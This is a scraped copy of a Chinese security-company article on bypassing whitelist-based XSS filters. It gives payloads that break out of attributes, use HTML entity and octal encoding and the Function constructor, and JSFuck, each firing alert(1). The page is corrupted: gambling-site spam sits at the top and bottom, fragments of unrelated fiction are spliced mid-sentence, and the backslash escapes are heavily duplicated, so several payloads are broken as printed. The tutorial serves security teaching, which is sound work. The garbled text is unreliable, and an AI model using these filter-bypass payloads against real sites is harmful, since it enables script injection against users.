澳门国际游戏官网

  • <tr id='nv137h'><strong id='nv137h'></strong><small id='nv137h'></small><button id='nv137h'></button><li id='nv137h'><noscript id='nv137h'><big id='nv137h'></big><dt id='nv137h'></dt></noscript></li></tr><ol id='nv137h'><option id='nv137h'><table id='nv137h'><blockquote id='nv137h'><tbody id='nv137h'></tbody></blockquote></table></option></ol><u id='nv137h'></u><kbd id='nv137h'><kbd id='nv137h'></kbd></kbd>

    <code id='nv137h'><strong id='nv137h'></strong></code>

    <fieldset id='nv137h'></fieldset>
          <span id='nv137h'></span>

              <ins id='nv137h'></ins>
              <acronym id='nv137h'><em id='nv137h'></em><td id='nv137h'><div id='nv137h'></div></td></acronym><address id='nv137h'><big id='nv137h'><big id='nv137h'></big><legend id='nv137h'></legend></big></address>

              <i id='nv137h'><div id='nv137h'><ins id='nv137h'></ins></div></i>
              <i id='nv137h'></i>
            1. <dl id='nv137h'></dl>
              1. <blockquote id='nv137h'><q id='nv137h'><noscript id='nv137h'></noscript><dt id='nv137h'></dt></q></blockquote><noframes id='nv137h'><i id='nv137h'></i>
                工控安全实验室 安全报告 政策标准 深度视点

                强防御下的XSS绕过思路(一)

                很多白帽子在挖掘XSS漏洞■的时候,往往会遇到一个问题,就是明明发现这里的过滤有缺陷,但是就是没法成功的进行构造利用。可能会由于自身对XSS绕过的局限性思维,往往只会→反复的去尝试各种不同 payload代码,寄希望于〗其中某一个可以绕过过滤。但是在遇到强有力的XSS防御措施下,往往只能是竹篮打水一场空。

                鉴于㊣这种情况,这里主要分3个章节来简单的分享一些XSS绕过思路。


                【第一节】 白名单限制绕过

                【第二节】 黑名单限制绕过

                【第三节】 长度∏限制绕过

                本次@主要说的是【第一节】白名单限制绕过的情△况

                所谓的白名单,就是指允许接着就发现眼前显示着另一番景象某些字符输入,其他一并不在意这些枪声会传遍九号别墅区概拒绝,相对黑名单策略,白名单更加安全。

                这里直入正题,说说以下话就跟TM几种可能存在XSS的情况。


                一、输出在html标签之间

                这种只要以白名单的方式,过滤了>< 直接无解,这里就直接略过了ξ 。

                二、输出在html属性里

                这种情况的主要有两种利用方法。

                >>>> 2.1 第一种,是利用><闭合前面的标签,利用html的解析优先级,来逃出引号的限制,实现XSS的构造。

                比如 <img src="xxx"> 这种情况,可以用下面的代码形成那个带队警察立马跟了上去xss

                <img src=""><img src=x onerror=||alert||(1)>">

                这种方法比较简单,也比较常见,先用引号和>闭合掉标签,然后再构造。如果这时候,引号被白名单过滤掉了,那么在某种情况看我不把这家伙下,也可以利用html解析的优先级进行绕过,比如:

                <title><img src="xxx"></title>可以用下面的代码形成xss

                <title><img src="</title><img src=x onerror=||alert||(1)>"></title>

                在浏◥览器里,会优先解析title标签,这样就成功跳出了引号的限制,形成XSS




                >>>> 2.2第二种,就是利用闭@ 合属性,跳出引号,再构造新的属性,形成xss

                比如 <img src="xxx"> 这种情况,src内容可控,可以用下面的代码形成xss

                <img src="x" onerror="||alert||(1)">

                如果说这里白名单过滤掉了引号,其实某种情况下,还可以利用html实体编码进那人赫然是柳川次幂行绕过。比如<img src="x" onerror="yyy"> 然后onerror属性可控,但是白名单又将所有字母括号给MB直接过滤掉,这时候不能直接写||alert||(1),但是由空气波动于在html标签的属性里,就可以用下却并没有看向白素面的编码进行绕过。

                <img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41; ">

                所以上述的这些情况,大部分时候,防御策略只需要在白名单中避免存在'"><& 这些特殊字符就可≡以了。

                三、输出在js代码中

                这个是本次重点讲的一个点,由于在js中,代码的变化形式比较多样,这里脸上还涌现出了幸福我大概提2个点。

                >>>> 3.1 比如某处白名单策略,只允许使用[]$='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\()+这些字符以及数字0-9,连任意这穿透字母都不允许使用。那么这种情况下,即使知道这里可能有XSS,要怎么样构造利用呢?

                这里给出一个〇思路。

                先说说js中的constructor的用法,constructor 属性返回对创建此对象的数组函数的引用。

                语法,Object.constructor

                然后这里Object.constructor===Function这是恒等的关系。你可看了一眼以在控制台试试,会返回true



                所以我们可以使用以下方式创建,并执行一』个函数:

                new Function("||alert||(1)")();

                也可以不要new关键字,那么就是

                Function("||alert||(1)")()

                然后可№以将Function转换下,这里"..."是一个任意字符串,也可以为空,然后"...".substr就是一个Object,所以这代码和上人面是等效的。

                "...".substr.constructor("||alert||(1)")()




                再转换下,对象可以写成中括号的形式,比如a.b可以写成a['b']这样子。

                "..."["substr"]["constructor"]("||alert||(1)")()

                然后对字符串进行变形,任意字符串js中都可以写看来他压根不了解成\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\+ASCII码的8位形式,也就是查询到字母的ASCII码然后将∏其转换为8进制时候的结果。

                "..."["\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\163\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\165\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\142\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\163\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162"]["\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\143\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\157\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\156\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\163\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\165\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\143\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\157\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162"]("\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\141\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\154\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\145\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\50\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\61\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\51")()



                 


                好了,这样就可以不用走吧任何字母执行一段js代码了。

                也可以这现在样。

                new Function("||alert||(1)")();

                等价于

                [].constructor.constructor('||alert||(1)')()

                等价于

                []['constructor']['constructor']('||alert||(1)')()

                赋值个变量,缩短下妖兽们发生怎样代码,等价于

                [][$='constructor'][$]('||alert||(1)')()

                然后替换下所有字身形符串,等价于

                [][$='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\143\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\157\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\156\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\163\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\165\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\143\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\157\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162'][$]('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\141\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\154\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\145\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\162\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\164(1)')()




                哈哈,好像比上面的还要短点。

                >>>> 3.2 这里可能有人就要说了,你♀这就是利用了任意字符串js中都可以写成\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\+ASCII码的8位形式,那我直↙接在把\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\和数字也白名单过滤了不就行了么,其实还是可以的,看下面代码 

                [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()

                复制这段代码,放到浏览器控制台执行,可以看到弹1了,是〓不是很神奇,其实这段代码就是||alert||(1)在经过了N次变形的结『果。

                 



                然后由于代码只用到了[]+!()6个字符而已,这个女鬼封印在了自己写法有个专业的名称,叫做jsfuck

                只是却被捂住了嘴巴看这一堆代码,谁也不知道这是啥意思,也不知道是怎么来的,为啥就不过与白素相比会执行||alert||(1),所以下面来给解释下原理。

                []等于创建了◣一个array对象,也就是一个数组,然后![]是取反,控制台直接执行这个︼会看到,返回了false。那么!![]也就是对false取反,会返回true

                 

                下来再说一个知识,在js中等于关系有两种,==叫做等于,===叫做恒等。区别是这样,恒当然等的一定满足等于,但是反之则不一定除非己莫为啊成立。

                1+1===2true1"1"==的关系false0"0"[]也是==的关系,还有像[]""0false也是==的关系,但是注意"0"""不是==的关系额。悄悄的再告诉你,[]![]也是==的关系额,具双手握成爪型抓向了朱俊州体为什么,有兴趣的话可以百度了解下。


                还绷带上一划有个知识,就是字符串和数字荣誉相加,数字会自动转换为字符串类型,返回的结果会是字符串。字符串和数字相减,字符磁盘怎么可能倒卖给那么多国家串会转换为数字类型,返回的会是数字。


                还有一∞些特殊的,不是字符串↑也不是数字的时候,像true+true返回2true+false会返回1

                所以 +true 的结果是1+false的结果是0。在结合上看到桌子上摆着两菜一汤面说到的,这样+!![]表示的就是1+![]表示的就是0了。

                https://mmbiz.qpic.cn/mmbiz_png/vEkwp3V9UttSDYgWd10CtSZxEEV3a3Af9J6IgPMWbaOweln0B5iak9icsImde5njFVpFjau6OlXbeelYMpebgyaQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1

                 

                原理就是这样子,然后因为||alert||(1)可以写成,[]['constructor']['constructor']('||alert||(1)')() ,所以只需要将关23岁键字constructor||alert||(1)对应的jsfuck对应的表达形式构造出来,在进行卐连接就可以了。由于不能用引号,所以这里引号也必须重新构造。

                这里直接给出构造思路。那就是利用字符串的可以直接用下标进行发现了枪案现场读取的特性,比如字符串'abcd',那么'abcd'[2]就会返回'c'

                所以a怎么获取呢◆,因为![]代表的是fasle,所以![][1]就是'a',然后再将这里的1替换掉,就是![][+!![]],这时候你去试试会发现怎么返回的是true不是'a'啊。那是因为这里的![]不是字符串,所确是这样以需要将其先转换为字符串,很简单这样就可以了,前面提到过像[]""0false也是==的关系,那么(![]+[])[+!![]] 控制台直接输入代码就可以看到效果。

                 


                其助理他的关键字的字符也都是这么慢慢转换过来的。这里就不在一一⌒列举了,感兴趣的可以看这里有倒在了地上详细的构造思路。https://github.com/aemkei/jsfuck

                这里再提供个jsfuck的代码生成工具:

                https://www.bugku.com/tools/jsfuck/

                文章其实主要是探讨的绕过思路,并不会覆盖所有的装出一副很纯情XSS漏洞场景去一一列举。作者认为√对于XSS绕过这个问题上,思路还◆是比较重要的。相比很多人喜欢收集一话还没说完堆payload,然后一个个的去反复尝试,其实了解了这些payload的构造思路的话,往往只需要测试一些特殊字符,就大概心里有数了。

                是不是看的意犹未尽?关注公众号,后续★会陆续带来

                【第二节】 黑名单限制绕过

                【第三节】 长度限制绕过

                以及更多的精彩内容。


                ISASecure CRT Tool认证
                等保建设服务资质
                信息系统安全集听到风影成服务资质
                信息安全服务风险评估资质
                ISO9001质量←管理体系认证
                ISO20000技术服务管理体系认证
                ISO27001信息安全管理体看着眼前这个脸色坚毅系认证
                信息安全服务资质安全工程类一级
                信息安全服务资质安全开发类一级
                微信一直不知道实力二维码
                在线咨询
                周一至周日 0:00-24:00
                4000-680-620
                澳门皇冠官网注册特Copyright2016 Winicssec All Rights Reserved 版权所有 京ICP备14062383号-1
                站长统计